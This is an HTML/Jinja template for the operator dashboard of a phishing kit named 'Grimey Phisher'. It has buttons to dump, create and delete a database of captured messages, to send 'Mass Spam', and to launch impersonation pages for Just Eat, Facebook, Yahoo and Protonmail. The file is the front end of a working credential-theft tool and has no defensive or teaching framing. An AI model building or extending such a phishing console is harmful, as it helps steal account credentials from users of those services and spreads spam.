<!DOCTYPE html>
<html lang="en">
<style>
body {
  background-color: #4B0082;
}
h1 {
  background-color: black;
  text-shadow: 2px 2px #4B0082;
  font-family: "Lucida Console", "Courier New", monospace;
}
button {
  background-color: #7CFC00;
  border: none;
  color: black;
  padding: 14px 40px;;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  border-radius: 12px
  
}
.button2:hover {
  box-shadow: 0 12px 16px 0 rgba(0,0,0,0.24),0 17px 50px 0 rgba(0,0,0,0.19);
}
li {
  background-color: #7CFC00;
  font-family: "Lucida Console", "Courier New", monospace;
}
footer {
  position: fixed;
  left: 0;
  bottom: 0;
  width: 100%;
  background-color: black;
  color: #4B0082;
  text-align: left;
}
b {
  text-shadow: 2px 2px black;
}
</style>
<head>
<meta charset="UTF-8">
<title>Grimey Phisher</title>
</head>
<body>
<form action="/" method="post">
<button type="submit" class="button button2">Refresh</button>
</form>
</br>
<form action="/dump_database" method="post">
<button type="submit" class="button button2">Dump Database</button>
</form>
</br>
<form action="/create_database" method="post">
<button type="submit" class="button button2">Create Database</button>
</form>
</br>
<form action="/delete_database" method="post">
<button type="submit" class="button button2">Delete Database</button>
</form>
</br>
<form action="/spam" method="post">
<button type="submit" class="button button2">Mass Spam</button>
</form>
</br>
<h2>Messages</h2>
{% for item in data %}
<b>{{item}}</b>
</tr>
{% endfor %}
</form>
</br>
</br>
</br>
<h1>Grimey Phisher</h1>
</br>
</br>
</br>
</br>
<form action="/justeattakeaway.com" method="post">
<button type="submit" class="button button2">Just Eat</button>
</form>
</br>
<form action="/facebook.com" method="post">
<button type="submit" class="button button2">Facebook</button>
</form>
</br>
<form action="/yahoo.com" method="post">
<button type="submit" class="button button2">Yahoo</button>
</form>
</br>
<form action="/protonmail.com" method="post">
<button type="submit" class="button button2">Protonmail</button>
</form>
</body>
</br>
<footer>
<li>-™Grimey Phisher 2021®-</li>
</footer>
</html>
